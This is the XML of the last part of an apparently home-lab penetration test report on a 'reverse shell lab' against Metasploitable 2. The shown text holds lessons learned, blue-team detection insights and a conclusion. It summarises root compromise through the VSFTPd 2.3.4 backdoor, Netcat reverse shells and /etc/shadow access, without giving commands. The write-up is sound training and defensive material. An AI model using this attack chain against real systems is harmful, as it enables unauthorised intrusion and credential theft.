        <w:t>Capturing all traffic in Wireshark from the start provided invaluable evidence and a complete audit trail of the attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Understanding the manual technique (Netcat) before using automated tools (Metasploit) built dee</w:t>
      </w:r>
      <w:r>
        <w:t>per comprehension of what is actually happening at the network layer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.3 Blue Team Insights</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Both the attacker IP and non-standard ports (4444, 6200) would have triggered alerts in a properly configured SIEM — baseline network behavior monitoring is essential</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD201E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> access event would be a high-severity alert in any EDR tool — file integr</w:t>
      </w:r>
      <w:r>
        <w:t>ity monitoring on sensitive files provides an additional detection layer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Even without decrypting Meterpreter traffic, the connection metadata (IP, port, duration, timing) is sufficient for anomaly detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This penetration test successfully</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> demonstrated a complete attack chain from initial reconnaissance through full system compromise and post-exploitation. The Metasploitable 2 target was fully compromised via multiple attack vectors, with root-level access achieved through the VSFTPd 2.3.4 </w:t>
      </w:r>
      <w:r>
        <w:t>backdoor (CVE-2011-2523) and manual reverse shell techniques using Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All attack traffic was captured and analyzed with </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD201E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t>, providing clear evidence of the attacks and valuable insight into how these techniques appear on the wire. The assessme</w:t>
      </w:r>
      <w:r>
        <w:t>nt reinforced the critical importance of patch management, egress filtering, and process-level anomaly detection as defensive controls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD201E" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This lab provides a strong foundation for further research into advanced exploitation techniques, privilege escala</w:t>
      </w:r>
      <w:r w:rsidR="00BD201E">
        <w:t xml:space="preserve">tion, </w:t>
      </w:r>
      <w:r>
        <w:t>and enterprise-level i</w:t>
      </w:r>
      <w:r w:rsidR="00BD201E">
        <w:t>ntrusion detection and response.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Report prepared by: Cleveland  |  March 2026  |  Home </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lab Security Research</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0004042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00C9" w:rsidRDefault="007200C9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007200C9" w:rsidRDefault="00720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423" w:rsidRDefault="007200C9">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Cleveland | Home La</w:t>
    </w:r>
    <w:r w:rsidR="00BD0E21">
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>b Security Research | 2026</w:t>
    </w:r>
    <w:r w:rsidR="00BD0E21">
      <w:rPr>
        <w:color w:val="888888"/>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00C9" w:rsidRDefault="007200C9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007200C9" w:rsidRDefault="007200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423" w:rsidRDefault="007200C9">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="CC0000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>PENETRATION TEST REPORT — REVERSE SHELL LAB</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="1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B1028"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09264A5E"/>
    <w:lvl w:ilvl="0" w:tplc="8084EA22">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="99664824">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="15AE22A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E716BD9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C5BA2C50">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="50FC2496">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F83A6650">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="62E20598">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E194AC8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="3BD36040"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="68F87878"/>
    <w:lvl w:ilvl="0" w:tplc="32F2F220">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="71BA806E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A3C6701A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="25188360">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="71F06FCC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="515823DC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="31A63972">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="26201344">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="630E9ED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40423"/>
    <w:rsid w:val="00040423"/>
    <w:rsid w:val="003E4BB0"/>
    <w:rsid w:val="007200C9"/>
    <w:rsid w:val="00BD0E21"/>
    <w:rsid w:val="00BD2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200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A1A1A"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="300" w:after="150"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="CC0000"/>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E4BB0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003E4BB0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E4BB0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003E4BB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200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A1A1A"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="300" w:after="150"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="CC0000"/>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E4BB0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003E4BB0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E4BB0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003E4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2111</Words>
  <Characters>12037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User1</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-07T16:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-07T16:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>